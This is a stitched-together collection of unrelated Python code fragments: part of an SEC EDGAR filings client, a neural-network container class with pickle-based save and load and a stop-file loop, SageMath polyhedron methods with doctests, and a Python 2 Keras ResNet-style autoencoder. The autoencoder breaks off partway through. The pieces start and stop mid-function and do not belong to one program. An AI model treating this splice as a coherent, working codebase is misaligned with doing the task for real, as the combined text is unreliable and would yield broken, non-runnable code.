date. For example, "2019-12-01" means return all the filings AFTER
            December 1, 2019. (default: {None})
Returns:
----
List[dict] -- A list of ownership filings.
"""
# define the arguments of the request
search_params = {
'CIK': cik,
'Count': '100',
'myowner': 'only',
'action': 'getcompany',
'output': 'atom',
'datea': after,
'dateb': before
}
# Make the response.
response = requests.get(
url=self.browse_service,
params=search_params
)
# Parse the entries.
entries = self.parser_client.parse_entries(entries_text=response.text)
return entries
def non_ownership_filings_by_cik(self, cik: str, before: str = None, after: str = None) -> List[dict]:
"""Returns all the non-ownership filings for a given CIK number in a given date range.
Arguments:
----
cik {str} -- The CIK number of the company to be queried.
Keyword Arguments:
----
before {Union[str, date]} -- Represents filings that you want before a | |
            raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__init_blank_net
@abc.abstractmethod
def remove_before_save(self) -> _TypeBuffer:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def reload_after_save(self, data: _TypeBuffer, /) -> None:
raise NotImplementedError("Abstract method!")
# ----------------------------------------------------------------------------------------------
@final
def redraw_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = self._create_current_net()
@final
def merge_net_model(self, model: NetModelInterface, /) -> None:
if not isinstance(model, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected {SimpleNetCon.__name__} got {type(model).__name__}"
)
self.__current_net = deepcopy(model.current_net)
@final
def re_copy_current_net(self) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__buffered_best_net = deepcopy(self.current_net)
self.__init_blank_net = deepcopy(self.current_net)
@final
def re_init_current_net(self, new_net: CurrentNetData, /) -> None:
if not isinstance(self.current_net, CurrentNetData):
raise KnownSimpleAnnError(f"SimpleNetCon is not in {CurrentNetData.__name__} mode")
self.__current_net = deepcopy(new_net)
self.__buffered_best_net = deepcopy(new_net)
self.__init_blank_net = deepcopy(new_net)
@final
def update_current_net(self, fitness: float, /) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
old_fitness = self.buffered_best_net.fitness
self.__current_net.fitness = fitness
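        # Lower fitness is treated as better here: the buffered best net is only
        # replaced when the new fitness does not exceed the previous best value.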
if fitness <= old_fitness:
self.__buffered_best_net = deepcopy(self.__current_net)
@final
def reset_current_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.init_blank_net)
@final
def set_best_net(self) -> None:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
self.__current_net = deepcopy(self.buffered_best_net)
@final
@property
def get_net_com(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.com
@final
@property
def get_net_lego(self) -> nn.Module:
if not isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
return self.__current_net.lego
@final
def save(self) -> Tuple[
bytes, Tuple[CurrentNetData, CurrentNetData, CurrentNetData], _TypeBuffer
]:
cr_net = self.current_net
if not isinstance(cr_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately loaded!")
buf_net = self.buffered_best_net
self.__current_net = (buf_net.fitness, buf_net.com.state_dict(), buf_net.lego.state_dict())
init_net = self.init_blank_net
self.__buffered_best_net = None
self.__init_blank_net = None
rem_buf = self.remove_before_save()
erg = (
rick.dumps(self, protocol=rick.HIGHEST_PROTOCOL),
(cr_net, buf_net, init_net), rem_buf
)
return erg
@final
def save_complete(self, saved_net: Tuple[CurrentNetData, ...],
saved_buf: _TypeBuffer, /) -> None:
if isinstance(self.__current_net, CurrentNetData):
raise KnownSimpleAnnError("The net was not appropriately saved!")
if len(saved_net) != 3:
raise KnownSimpleAnnError(f"Expected saved_net tuple length 3 got {len(saved_net)}!")
for elem in saved_net:
if not isinstance(elem, CurrentNetData):
raise KnownSimpleAnnError(f"Expected CurrentNetData got {type(elem).__name__}!")
self.__current_net = saved_net[0]
self.__buffered_best_net = saved_net[1]
self.__init_blank_net = saved_net[2]
self.reload_after_save(saved_buf)
@final
def load_tuple_dict_stats(self, data: Tuple[float, Dict, Dict],
extra_args: InitContainer, /) -> None:
self.__current_net = self._create_current_loaded_net(extra_args)
self.__current_net.fitness = data[0]
self.__current_net.com.load_state_dict(data[1])
self.__current_net.com.eval()
self.__current_net.lego.load_state_dict(data[2])
self.__current_net.lego.eval()
self.__buffered_best_net = deepcopy(self.__current_net)
self.__init_blank_net = deepcopy(self.__current_net)
@classmethod
@final
def load(cls, data: bytes, extra_args: InitContainer, /) -> 'SimpleNetCon':
if not isinstance(extra_args, InitContainer):
raise KnownSimpleAnnError(
f"Expected args to be {InitContainer.__name__} got {type(extra_args).__name__}!"
)
loaded_net = rick.loads(data)
if not isinstance(loaded_net, SimpleNetCon):
raise KnownSimpleAnnError(
f"Expected bytes to be {SimpleNetCon.__name__} got {type(loaded_net).__name__}!"
)
loaded_tuple = loaded_net.current_net
if not isinstance(loaded_tuple, tuple):
raise KnownSimpleAnnError(
f"Expected tuple got {type(loaded_tuple).__name__}!"
)
if len(loaded_tuple) != 3:
raise KnownSimpleAnnError(
f"Expected tuple to have 3 elements got {len(loaded_tuple)}!"
)
if not (isinstance(loaded_tuple[0], float)
and isinstance(loaded_tuple[1], dict)
and isinstance(loaded_tuple[2], dict)):
raise KnownSimpleAnnError("Received wrong typed tuple!")
casted_tuple = (
float(loaded_tuple[0]),
{**loaded_tuple[1]},
{**loaded_tuple[2]}
)
loaded_net.load_tuple_dict_stats(casted_tuple, extra_args)
return loaded_net
@final
@dataclass
class _SimpleANNCon:
test_data: Optional[Tuple[Dataset, ...]] = None
train_data: Optional[Tuple[Dataset, ...]] = None
eval_data: Optional[Tuple[Dataset, ...]] = None
stop_op_fp: Optional[Path] = None
is_trainable: Tuple[bool, bool] = (True, False)
def _unlink_if_exists(file_p: Path, /) -> None:
if file_p.exists() and file_p.is_file():
file_p.unlink()
@final
class DataSetTypes(Enum):
TRAIN = 'TrainData'
TEST = 'TestData'
EVAL = 'EvalData'
def _move_data_to_shared_mem(data_t: Optional[Tuple[Dataset, ...]],
smm: SharedMemoryManager, /) -> None:
if data_t is not None:
for data in data_t:
if isinstance(data, DataSetSharedMemoryA):
data.move_data_to_shared_memory(smm)
class SimpleAnnNet(
NodeANNDataElemInterface[nn.Module, CurrentNetData, _TypeBuffer, InitContainer],
abc.ABC
):
def __init__(self, args: InitNetArgs, /) -> None:
super().__init__()
self.__arguments_con = args
self.__data_container = _SimpleANNCon()
self.__savable: Optional[
NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]
] = None
self.__net_module: Optional[SimpleNetCon] = None
self.__data_name = "NotSet"
@final
def get_node_name(self) -> str:
return self.__data_name
@final
def set_node_name(self, name: str) -> None:
self.__data_name = name
@final
def _move_data_sets_to_shared_memory(self, smm: Optional[SharedMemoryManager], /) -> None:
if smm is not None:
_move_data_to_shared_mem(self.__data_container.train_data, smm)
_move_data_to_shared_mem(self.__data_container.eval_data, smm)
@abc.abstractmethod
def re_read_data(self, data_type: DataSetTypes, /) -> Optional[Tuple[Dataset, ...]]:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_net_state(self) -> NetGeneralState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def check_init_state(self) -> InitState:
raise NotImplementedError("Abstract method!")
@abc.abstractmethod
def get_truth_fun_id(self) -> str:
raise NotImplementedError("Abstract method!")
@final
    def stop_file_it_min(self, it_cnt: int, run_time_min: int, /) -> bool:
        # Keep running while the iteration limit has not been reached (or is not set),
        # the stop file still exists (or none was created), and the time limit
        # has not been reached (or is not set).
        return (
            it_cnt < self.arguments_con.hyper_optim_wr.stop_iterations
            or not self.arguments_con.hyper_optim_wr.stop_iterations
        ) and (
            self.stop_file is None
            or (self.stop_file.exists() and self.stop_file.is_file())
        ) and (
            run_time_min < self.arguments_con.hyper_optim_wr.stop_time_min
            or not self.arguments_con.hyper_optim_wr.stop_time_min
        )
@final
@property
def stop_file(self) -> Optional[Path]:
return self.__data_container.stop_op_fp
@final
def stop_file_set(self, file_p: Optional[Path], /) -> None:
if file_p is not None and file_p.exists() and file_p.is_file():
self.__data_container.stop_op_fp = file_p
@final
@property
def arguments_con(self) -> InitNetArgs:
return self.__arguments_con
@final
def is_trainable(self) -> bool:
return self.retrain and not self.random_net
@final
@property
def retrain(self) -> bool:
return self.__data_container.is_trainable[0]
@final
def retrain_set(self, retrain: bool, /) -> None:
self.__data_container.is_trainable = (retrain, self.__data_container.is_trainable[1])
@final
@property
def random_net(self) -> bool:
return self.__data_container.is_trainable[1]
@final
def random_net_set(self, random_net: bool, /) -> None:
self.__data_container.is_trainable = (self.__data_container.is_trainable[0], random_net)
@final
@property
def test_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.test_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TEST)
if temp_data is not None:
self.test_data_set(temp_data)
return self.__data_container.test_data
@final
def test_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given test data set was empty")
self.__data_container.test_data = data
@final
@property
def train_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.train_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.TRAIN)
if temp_data is not None:
self.train_data_set(temp_data)
return self.__data_container.train_data
@final
def train_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given train data set was empty")
self.__data_container.train_data = data
@final
@property
def eval_data(self) -> Tuple[Dataset, ...]:
if self.__data_container.eval_data is None:
return ()
temp_data = self.re_read_data(DataSetTypes.EVAL)
if temp_data is not None:
self.eval_data_set(temp_data)
return self.__data_container.eval_data
@final
def eval_data_set(self, data: Tuple[Dataset, ...], /) -> None:
if not (isinstance(data, tuple) and data):
raise KnownSimpleAnnError("The given eval data set was empty")
self.__data_container.eval_data = data
@final
@property
def savable(self) -> \
Optional[NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]]:
return self.__savable
@final
def savable_set(self, savable: NetSavable[
nn.Module, CurrentNetData, _TypeBuffer, InitContainer
], /) -> None:
self.__savable = savable
@final
def get_savable_data(self) -> NetSavable[nn.Module, CurrentNetData, _TypeBuffer, InitContainer]:
if self.__savable is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__savable
@final
@property
def net_module(self) -> Optional[SimpleNetCon]:
return self.__net_module
@final
def net_module_set(self, module: SimpleNetCon, /) -> None:
if self.__net_module is not None:
raise KnownSimpleAnnError("Net was already initialised!")
self.__net_module = module
@final
def get_savable_net(self) -> SimpleNetCon:
if self.__net_module is None:
raise KnownSimpleAnnError("Net was not initialised!")
return self.__net_module
@final
def _update_hyper_run(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
self.get_savable_net().reset_current_net()
self._update_hyper(hyper_cont, new_params)
@final
def _update_hyper(self, hyper_cont: HyperOptimInterfaceArgs,
new_params: Dict[str, HyperOptimReturnElem], /) -> None:
update_hyper_params(self.get_savable_net(), self.arguments_con, new_params)
update_hyper_container(self.arguments_con, hyper_cont)
@final
def _create_train_interface(self, id_file: ANNTreeIdType,
copy: bool, id_mod: str, /) -> TrainerInterfaceArgs:
if self.arguments_con.net_state.get_kwargs().redraw:
self.get_savable_net().redraw_current_net()
if copy:
buf = self.get_savable_net().remove_before_save()
new_mod = deepcopy(self.get_savable_net())
self.get_savable_net().reload_after_save(buf)
else:
new_mod = self.get_savable_net()
new_train_args = TrainerInterfaceArgs(
module=new_mod,
input_train=self.train_data,
input_eval=self.eval_data,
id_file=deepcopy(id_file),
dump=self.arguments_con.net_state.get_kwargs().dump,
cuda=self.arguments_con.net_state.get_kwargs().cuda,
optimizer=deepcopy(self.arguments_con.optimizer_wr)
if copy else self.arguments_con.optimizer_wr,
scheduler=deepcopy(self.arguments_con.scheduler_wr)
if copy else self.arguments_con.scheduler_wr,
criterion=deepcopy(self.arguments_con.criterion_wr)
if copy else self.arguments_con.criterion_wr,
truth_fun_id=self.get_truth_fun_id(),
hyper_str=create_hyper_param_str(self.get_node_name(), self.arguments_con)
)
if id_mod:
new_train_args.id_file.add_modifier(id_mod)
return new_train_args
@final
def _create_stop_file(self, id_file: ANNTreeIdType, /) -> Optional[Path]:
if self.arguments_con.hyper_optim_wr is not None \
and self.arguments_con.hyper_optim_wr.stop_file is not None \
and self.arguments_con.hyper_optim_wr.stop_file.exists() \
and self.arguments_con.hyper_optim_wr.stop_file.is_dir():
merged_str = \
f"{id_file.id_merged_str}_{datetime.now().strftime('%d_%m_%Y__%H_%M_%S')}.lock"
stop_file = self.arguments_con.hyper_optim_wr.stop_file.joinpath(merged_str)
stop_file.touch()
atexit.register(_unlink_if_exists, stop_file)
return stop_file
return None
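    # Note: the .lock file created above acts as a run token. ``stop_file_it_min``
    # keeps the hyper-parameter search running only while this file exists, so
    # deleting it requests a graceful stop; it is also removed automatically at exit.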
def _get_new_params(self, generator_optim: HGenTA, fixed_params: _TrFitParam,
run_cont: _RunningConst, /) -> List[Dict[str, HyperOptimReturnElem]]:
run_cnt = 0
l_new_params: List[Dict[str, HyperOptimReturnElem]] = []
while run_cnt < 10 and not l_new_params:
run_cnt += 1
try:
l_new_params = generator_optim.send(fixed_params)
except StopIteration:
run_cont.running = False
run_cnt = 10
else:
run_cont.running = self.stop_file_it_min(run_cont.run_id, run_cont.run_time_min)
if not l_new_params:
run_cont.running = False
return l_new_params
def _train_single(self, sync_out: SyncStdoutInterface, run_cont: _RunningConst,
hyper_cont: HyperOptimInterfaceArgs,
id_file: ANNTreeIdType, /) -> Iterable[TrainNNStatsElementType]:
if self.arguments_con.hyper_optim_wr is None:
raise KnownSimpleAnnError("Hyper-optimiser is not defined!")
generator_optim = self.arguments_con.hyper_optim_wr.hyper.hyper_optim(
sync_out, hyper_cont
)
try:
l_new_params: List[Dict[str, HyperOptimReturnElem]] = next(generator_optim)
except StopIteration:
raise KnownSimpleAnnError("Generator could not be started!")
while run_cont.running:
tr_fit: _TrFitAl = ([], [])
trainer_args = []
for param_id, new_param in enumerate(l_new_params):
run_cont.hyper_cont_buffer = deepcopy(hyper_cont)
self.arguments_con.prepare_wr.init_prepare()
self._update_hyper_run(run_cont.hyper_cont_buffer, new_param)
yield from self.arguments_con.prepare_wr.prepare.run_train(
sync_out, PrepareInterfaceArgs(
trainer=deepcopy(self.arguments_con.trainer_wr.trainer),
trainer_args=self._create_train_interface(
id_file, False, str(run_cont.run_id + param_id)
)
)
)
re_copy_model(
self.arguments_con.prepare_wr.prepare.p_state_dict,
self.get_savable_net().get_net_com
)
tr_fit_res = self.arguments_con.prepare_wr.prepare.fitness
tr_fit[0].append((tr_fit_res[0], _create_hyper_params(run_cont.hyper_cont_buffer)))
tr_fit[1].append(tr_fit_res[1])
trainer_args.append(run_cont.hyper_cont_buffer)
self.get_savable_net().update_current_net(tr_fit_res[0])
run_cont.fit_plotter.update_fitness(tr_fit, trainer_args)
self._update_hyper(hyper_cont, run_cont.fit_plotter.bets_fit_h_param[1])
| |
if is_zero(Hvec*Vvec + Hconst):
incidence_matrix[Vindex, Hindex] = 1
# A ray or line is considered incident with a hyperplane,
# if it is orthogonal to the normal vector of the hyperplane.
for Vvec, Vindex in Vvectors_rays_lines:
if is_zero(Hvec*Vvec):
incidence_matrix[Vindex, Hindex] = 1
incidence_matrix.set_immutable()
return incidence_matrix
@cached_method
def slack_matrix(self):
r"""
Return the slack matrix.
The entries correspond to the evaluation of the Hrepresentation
elements on the Vrepresentation elements.
.. NOTE::
The columns correspond to inequalities/equations in the
order :meth:`Hrepresentation`, the rows correspond to
vertices/rays/lines in the order
:meth:`Vrepresentation`.
.. SEEALSO::
:meth:`incidence_matrix`.
EXAMPLES::
sage: P = polytopes.cube()
sage: P.slack_matrix()
[0 2 2 2 0 0]
[0 0 2 2 0 2]
[0 0 0 2 2 2]
[0 2 0 2 2 0]
[2 2 0 0 2 0]
[2 2 2 0 0 0]
[2 0 2 0 0 2]
[2 0 0 0 2 2]
sage: P = polytopes.cube(intervals='zero_one')
sage: P.slack_matrix()
[0 1 1 1 0 0]
[0 0 1 1 0 1]
[0 0 0 1 1 1]
[0 1 0 1 1 0]
[1 1 0 0 1 0]
[1 1 1 0 0 0]
[1 0 1 0 0 1]
[1 0 0 0 1 1]
sage: P = polytopes.dodecahedron().faces(2)[0].as_polyhedron()
sage: P.slack_matrix()
[1/2*sqrt5 - 1/2 0 0 1 1/2*sqrt5 - 1/2 0]
[ 0 0 1/2*sqrt5 - 1/2 1/2*sqrt5 - 1/2 1 0]
[ 0 1/2*sqrt5 - 1/2 1 0 1/2*sqrt5 - 1/2 0]
[ 1 1/2*sqrt5 - 1/2 0 1/2*sqrt5 - 1/2 0 0]
[1/2*sqrt5 - 1/2 1 1/2*sqrt5 - 1/2 0 0 0]
sage: P = Polyhedron(rays=[[1, 0], [0, 1]])
sage: P.slack_matrix()
[0 0]
[0 1]
[1 0]
TESTS::
sage: Polyhedron().slack_matrix()
[]
sage: Polyhedron(base_ring=QuadraticField(2)).slack_matrix().base_ring()
Number Field in a with defining polynomial x^2 - 2 with a = 1.41...
"""
if not self.n_Vrepresentation() or not self.n_Hrepresentation():
slack_matrix = matrix(self.base_ring(), self.n_Vrepresentation(),
self.n_Hrepresentation(), 0)
else:
Vrep_matrix = matrix(self.base_ring(), self.Vrepresentation())
Hrep_matrix = matrix(self.base_ring(), self.Hrepresentation())
# Getting homogeneous coordinates of the Vrepresentation.
hom_helper = matrix(self.base_ring(), [1 if v.is_vertex() else 0 for v in self.Vrepresentation()])
hom_Vrep = hom_helper.stack(Vrep_matrix.transpose())
slack_matrix = (Hrep_matrix * hom_Vrep).transpose()
slack_matrix.set_immutable()
return slack_matrix
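    # Note: a zero entry of the slack matrix corresponds to a 1 in
    # ``incidence_matrix``: the corresponding V-representation element is
    # incident with that H-representation element.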
def base_ring(self):
"""
Return the base ring.
OUTPUT:
The ring over which the polyhedron is defined. Must be a
sub-ring of the reals to define a polyhedron, in particular
comparison must be defined. Popular choices are
* ``ZZ`` (the ring of integers, lattice polytope),
* ``QQ`` (exact arithmetic using gmp),
* ``RDF`` (double precision floating-point arithmetic), or
* ``AA`` (real algebraic field).
EXAMPLES::
sage: triangle = Polyhedron(vertices = [[1,0],[0,1],[1,1]])
sage: triangle.base_ring() == ZZ
True
"""
return self.parent().base_ring()
def backend(self):
"""
Return the backend used.
OUTPUT:
The name of the backend used for computations. It will be one of
the following backends:
* ``ppl`` the Parma Polyhedra Library
* ``cdd`` CDD
* ``normaliz`` normaliz
* ``polymake`` polymake
* ``field`` a generic Sage implementation
EXAMPLES::
sage: triangle = Polyhedron(vertices = [[1, 0], [0, 1], [1, 1]])
sage: triangle.backend()
'ppl'
sage: D = polytopes.dodecahedron()
sage: D.backend()
'field'
sage: P = Polyhedron([[1.23]])
sage: P.backend()
'cdd'
"""
return self.parent().backend()
@cached_method
def center(self):
"""
Return the average of the vertices.
.. SEEALSO::
:meth:`representative_point`.
OUTPUT:
The center of the polyhedron. All rays and lines are
ignored. Raises a ``ZeroDivisionError`` for the empty
polytope.
EXAMPLES::
sage: p = polytopes.hypercube(3)
sage: p = p + vector([1,0,0])
sage: p.center()
(1, 0, 0)
"""
if self.dim() == 0:
return self.vertices()[0].vector()
else:
vertex_sum = vector(self.base_ring(), [0]*self.ambient_dim())
for v in self.vertex_generator():
vertex_sum += v.vector()
vertex_sum.set_immutable()
return vertex_sum / self.n_vertices()
@cached_method(do_pickle=True)
def centroid(self, engine='auto', **kwds):
r"""
Return the center of the mass of the polytope.
The mass is taken with respect to the induced Lebesgue measure,
see :meth:`volume`.
If the polyhedron is not compact, a ``NotImplementedError`` is
raised.
INPUT:
- ``engine`` -- either 'auto' (default), 'internal',
'TOPCOM', or 'normaliz'. The 'internal' and 'TOPCOM' instruct
this package to always use its own triangulation algorithms
or TOPCOM's algorithms, respectively. By default ('auto'),
TOPCOM is used if it is available and internal routines otherwise.
- ``**kwds`` -- keyword arguments that are passed to the
triangulation engine (see :meth:`triangulate`).
OUTPUT: The centroid as vector.
ALGORITHM:
We triangulate the polytope and find the barycenter of the simplices.
We add the individual barycenters weighted by the fraction of the total
mass.
EXAMPLES::
sage: P = polytopes.hypercube(2).pyramid()
sage: P.centroid()
(1/4, 0, 0)
sage: P = polytopes.associahedron(['A',2])
sage: P.centroid()
(2/21, 2/21)
sage: P = polytopes.permutahedron(4, backend='normaliz') # optional - pynormaliz
sage: P.centroid() # optional - pynormaliz
(5/2, 5/2, 5/2, 5/2)
The method is not implemented for unbounded polyhedra::
sage: P = Polyhedron(vertices=[(0,0)],rays=[(1,0),(0,1)])
sage: P.centroid()
Traceback (most recent call last):
...
NotImplementedError: the polyhedron is not compact
The centroid of an empty polyhedron is not defined::
sage: Polyhedron().centroid()
Traceback (most recent call last):
...
ZeroDivisionError: rational division by zero
TESTS::
sage: Polyhedron(vertices=[[0,1]]).centroid()
(0, 1)
"""
if not self.is_compact():
raise NotImplementedError("the polyhedron is not compact")
if self.n_vertices() == self.dim() + 1:
# The centroid of a simplex is its center.
return self.center()
triangulation = self.triangulate(engine=engine, **kwds)
if self.ambient_dim() == self.dim():
pc = triangulation.point_configuration()
else:
from sage.geometry.triangulation.point_configuration import PointConfiguration
A, b = self.affine_hull_projection(as_affine_map=True, orthogonal=True, orthonormal=True, extend=True)
pc = PointConfiguration((A(v.vector()) for v in self.Vrep_generator()))
barycenters = [sum(self.Vrepresentation(i).vector() for i in simplex)/(self.dim() + 1) for simplex in triangulation]
volumes = [pc.volume(simplex) for simplex in triangulation]
centroid = sum(volumes[i]*barycenters[i] for i in range(len(volumes)))/sum(volumes)
if self.ambient_dim() != self.dim():
# By the affine hull projection, the centroid has base ring ``AA``,
# so we try to return the centroid in a reasonable ring.
try:
return centroid.change_ring(self.base_ring().fraction_field())
except ValueError:
pass
return centroid
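# (added note) As described in the ALGORITHM block above: each simplex of the
# triangulation contributes its barycenter, weighted by that simplex's share
# of the total volume; for non-full-dimensional polytopes the simplex volumes
# are computed in the orthonormal affine-hull projection so that the weights
# correspond to the induced Lebesgue measure.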
@cached_method
def representative_point(self):
"""
Return a "generic" point.
.. SEEALSO::
:meth:`center`.
OUTPUT:
A point as a coordinate vector. The point is chosen to be
interior as far as possible. If the polyhedron is not
full-dimensional, the point is in the relative interior. If
the polyhedron is zero-dimensional, its single point is
returned.
EXAMPLES::
sage: p = Polyhedron(vertices=[(3,2)], rays=[(1,-1)])
sage: p.representative_point()
(4, 1)
sage: p.center()
(3, 2)
sage: Polyhedron(vertices=[(3,2)]).representative_point()
(3, 2)
"""
accumulator = vector(self.base_ring(), [0]*self.ambient_dim())
for v in self.vertex_generator():
accumulator += v.vector()
accumulator /= self.n_vertices()
for r in self.ray_generator():
accumulator += r.vector()
accumulator.set_immutable()
return accumulator
def a_maximal_chain(self):
r"""
Return a maximal chain of the face lattice in increasing order.
EXAMPLES::
sage: P = polytopes.cube()
sage: P.a_maximal_chain()
[A -1-dimensional face of a Polyhedron in ZZ^3,
A 0-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 1 vertex,
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices,
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 4 vertices,
A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 8 vertices]
sage: P = polytopes.cube()
sage: chain = P.a_maximal_chain(); chain
[A -1-dimensional face of a Polyhedron in ZZ^3,
A 0-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 1 vertex,
A 1-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 2 vertices,
A 2-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 4 vertices,
A 3-dimensional face of a Polyhedron in ZZ^3 defined as the convex hull of 8 vertices]
sage: [face.ambient_V_indices() for face in chain]
[(), (5,), (0, 5), (0, 3, 4, 5), (0, 1, 2, 3, 4, 5, 6, 7)]
TESTS::
Check output for the empty polyhedron::
sage: P = Polyhedron()
sage: P.a_maximal_chain()
[A -1-dimensional face of a Polyhedron in ZZ^0]
"""
comb_chain = self.combinatorial_polyhedron().a_maximal_chain()
from sage.geometry.polyhedron.face import combinatorial_face_to_polyhedral_face
empty_face = self.faces(-1)[0]
universe = self.faces(self.dim())[0]
if self.dim() == -1:
return [empty_face]
return [empty_face] + \
[combinatorial_face_to_polyhedral_face(self, face)
for face in comb_chain] + \
[universe]
@cached_method
def radius_square(self):
"""
Return the square of the maximal distance from the
:meth:`center` to a vertex. All rays and lines are ignored.
OUTPUT:
The square of the radius, which is in :meth:`base_ring`.
import tensorflow as tf
import numpy as np
import PIL as pil
import scipy
import skimage.measure
from keras.layers import Input, Dense, Conv2D, MaxPooling2D, UpSampling2D, Cropping2D, ZeroPadding2D, Convolution2D, Activation, AveragePooling2D, Flatten, Reshape
from keras.layers import Deconvolution2D as Conv2DTranspose
from keras.layers.normalization import BatchNormalization
from keras.applications.resnet50 import conv_block, identity_block
from keras.models import Model
from keras.optimizers import SGD, RMSprop
from keras import backend as K
from keras import regularizers
def pixel_weighted_loss(x_p,y):
x=x_p[:,:,:,:1]
weights=x_p[:,:,:,1:]
return K.mean(weights * K.square(y - x), axis=-1)
def mse_evbyev0(x,y):
return K.mean(K.square(y-x),axis=0)
def mse_evbyev1(x,y):
return K.mean(K.square(y-x),axis=1)
def mse_evbyev2(x,y):
return K.mean(K.square(y-x),axis=2)
def mse_evbyev3(x,y):
return K.mean(K.square(y-x),axis=3)
def mse_evbyev(x,y):
return K.mean(K.square(y-x),axis=(1,2,3))
def mse_evbyev_w(x_p,y):
x=x_p[:,:,:,:1]
weights=x_p[:,:,:,1:]
return K.mean(weights * K.square(y-x),axis=(1,2,3))
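# (added note, not in the original file) Keras calls a loss as loss(y_true,
# y_pred), so in the custom losses above `x_p` is y_true and `y` is y_pred.
# y_true is expected to carry two channels stacked on the last axis:
# channel 0 is the target image and channel 1 is a per-pixel weight map,
# which is why the data generators below return np.dstack([z, zw/sumw]) as
# the label. pixel_weighted_loss is then a weighted MSE and mse_evbyev_w is
# the same quantity reported per sample.
# Minimal numpy shape sketch (hypothetical toy arrays, just to show the layout):
#   y_true = np.zeros((1, 512, 512, 2)); y_true[..., 1] = 1.0  # weights
#   y_pred = np.zeros((1, 512, 512, 1))
#   np.mean(y_true[..., 1:] * (y_pred - y_true[..., :1]) ** 2)  # -> 0.0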
base_wh = 512
input_img = Input(shape=(base_wh, base_wh, 1)) # adapt this if using `channels_first` image data format
if True:
x = ZeroPadding2D((3, 3))(input_img)
print x.name, x.get_shape()
x = Convolution2D(64, 7, 7, subsample=(2, 2), name='conv1')(x)
print x.name, x.get_shape()
x = BatchNormalization(axis=3, name='bn_conv1')(x)
print x.name, x.get_shape()
x = Activation('relu')(x)
print x.name, x.get_shape()
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1))
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c')
print x.name, x.get_shape()
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d')
print x.name, x.get_shape()
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f')
print x.name, x.get_shape()
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c')
print x.name, x.get_shape()
x = AveragePooling2D((7, 7), name='avg_pool')(x)
print x.name, x.get_shape()
x = Flatten()(x)
print x.name, x.get_shape()
x = Dense(2*32*32)(x)
print x.get_shape()
encoded = x
#decoded = Reshape((32,32,2))(x)
x = Dense(2*2*2048)(x)
print x.name, x.get_shape()
x = Reshape((2,2,2048))(x)
print x.name, x.get_shape()
x = Conv2DTranspose(2048,1,1,(None,16,16,2048),subsample=(8,8))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [512, 512, 2048], strides=(1,1), stage=6, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=6, block='b')
print x.name, x.get_shape()
x = identity_block(x, 3, [512, 512, 2048], stage=6, block='c')
print x.name, x.get_shape()
x = Conv2DTranspose(1024,1,1,(None,32,32,1024),subsample=(2,2))(x)
print x.name, x.get_shape()
x = conv_block(x, 3, [256, 256, 1024], strides=(1,1), stage=7, block='a')
print x.name, x.get_shape()
x = identity_block(x, 3, [256, 256, 1024], stage=7, block='b')
